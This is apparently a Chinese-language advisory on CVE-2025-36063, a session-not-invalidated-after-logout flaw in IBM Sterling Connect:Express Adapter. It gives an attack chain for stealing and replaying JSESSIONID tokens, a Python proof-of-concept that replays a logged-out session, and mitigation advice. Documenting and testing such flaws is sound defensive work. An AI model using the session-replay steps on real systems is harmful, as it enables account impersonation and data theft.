CVE-2025-36063: IBM Sterling Connect:Express 会话管理漏洞导致用户冒充

漏洞信息

漏洞编号

CVE-2025-36063

漏洞类型

会话管理/会话固定

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0

漏洞概述

CVE-2025-36063是IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0版本中发现的一个中等严重性安全漏洞。该漏洞的根本原因在于应用程序在用户登出后未能正确使会话失效，导致已认证用户的会话令牌仍然保持有效状态。攻击者可以通过获取或预测有效的会话标识符，在目标用户登出系统后继续使用该会话进行身份验证，从而实现对目标用户账户的冒充。这种会话固定或会话劫持漏洞使得攻击者能够在不需要知道用户凭据的情况下，以合法用户的身份访问系统资源、执行操作或窃取敏感数据。由于该产品主要用于企业间的B2B集成和文件传输，漏洞的成功利用可能导致商业敏感信息泄露、交易数据篡改或供应链安全问题。CVSS 3.1评分为6.3（中等），表明该漏洞对机密性、完整性和可用性都造成一定影响，但需要攻击者具备低权限并通过网络进行访问。

技术细节

该漏洞属于OWASP会话管理安全类别中的Session Fixation（会话固定）或Session Not Invalidated After Logout（登出后会话未失效）问题。在IBM Sterling Connect:Express Adapter的认证实现中，系统在用户登录时创建会话标识符，但在用户执行登出操作时仅终止用户界面访问，而未在服务器端使该会话标识符失效或将其标记为已撤销。具体技术细节如下：1) 会话令牌管理缺陷：登出操作仅清除客户端Cookie或会话存储，而服务器端的会话状态仍保留为活跃；2) 会话预测/固定机会：攻击者可在用户登录前预先设置会话ID，登录后该ID继续有效；3) 权限提升路径：攻击者获取有效会话后，可绕过重新认证直接访问需要认证的资源；4) 影响范围扩展：由于该组件与Sterling B2B Integrator深度集成，被劫持的会话可能影响整个B2B交易流程。攻击者可通过中间人攻击、跨站脚本或直接访问会话存储等方式获取有效会话标识符。

攻击链分析

STEP 1

步骤1

攻击者通过中间人攻击、XSS漏洞或访问日志等方式获取目标用户的有效会话标识符（JSESSIONID）

STEP 2

步骤2

目标用户正常登录IBM Sterling Connect:Express系统，攻击者记录此时获取的会话标识符

STEP 3

步骤3

目标用户完成业务操作后执行登出操作，但由于系统未正确使会话在服务器端失效，会话标识符仍然有效

STEP 4

步骤4

攻击者使用之前获取的会话标识符发送请求，由于服务器未验证会话状态，攻击请求被接受

STEP 5

步骤5

攻击者成功冒充目标用户身份，可访问敏感数据、修改交易信息或执行未经授权的操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36063 PoC - Session Not Invalidated After Logout
# This PoC demonstrates the session management vulnerability in
# IBM Sterling Connect:Express Adapter

import requests
import re

TARGET_URL = "https://target-ibm-sterling.example.com:8443"
ATTACKER_IP = "192.168.1.100"

def exploit_session_not_invalidated():
    """
    Simulate the attack flow for CVE-2025-36063:
    Session remains valid after logout, allowing user impersonation
    """
    session = requests.Session()
    
    # Step 1: Legitimate user login
    print("[+] Step 1: Victim user login")
    login_data = {
        "username": "victim_user",
        "password": "victim_password"
    }
    response = session.post(f"{TARGET_URL}/login", data=login_data)
    
    # Extract session cookie
    session_cookie = session.cookies.get_dict().get('JSESSIONID')
    print(f"[+] Session ID obtained: {session_cookie}")
    
    # Step 2: Capture session ID (attacker perspective)
    # In real attack, this could be via XSS, MITM, or session prediction
    captured_session = session_cookie
    print(f"[+] Attacker captured session: {captured_session}")
    
    # Step 3: Victim performs logout
    print("[-] Victim logs out")
    session.post(f"{TARGET_URL}/logout")
    print("[+] Logout completed (session should be invalidated)")
    
    # Step 4: Attacker reuses the old session ID
    print("[+] Step 4: Attacker reuses captured session ID")
    attacker_session = requests.Session()
    attacker_session.cookies.set('JSESSIONID', captured_session)
    
    # Step 5: Verify session still works after logout (VULNERABILITY)
    response = attacker_session.get(f"{TARGET_URL}/api/user/profile")
    if response.status_code == 200:
        print("[!] VULNERABLE: Session still valid after logout!")
        print(f"[!] Attacker can impersonate victim with session: {captured_session}")
        return True
    else:
        print("[+] Patch verified: Session properly invalidated")
        return False

if __name__ == "__main__":
    print("="*60)
    print("CVE-2025-36063 - Session Not Invalidated After Logout")
    print("Target: IBM Sterling Connect:Express Adapter")
    print("="*60)
    exploit_session_not_invalidated()

影响范围

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.00

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.01

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.02

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.03

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.04

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.05

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.06

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.07

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.08

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.09

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.10

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.11

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.12

防御指南

临时缓解措施

如果无法立即应用官方补丁，可以采取以下临时缓解措施：1) 监控异常会话活动，特别是来自不同IP地址的同一会话访问；2) 限制会话生命周期，在非活跃时段自动终止会话；3) 强制用户定期重新登录；4) 启用双因素认证以增强身份验证安全性；5) 在负载均衡器或WAF层面实施会话管理策略；6) 审计日志中记录会话创建和终止事件以便追踪可疑活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36063
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36063
3 Details https://www.cvedetails.com/cve/CVE-2025-36063/
4 VulDB https://vuldb.com/cve/CVE-2025-36063
5 Link https://www.ibm.com/support/pages/node/7257244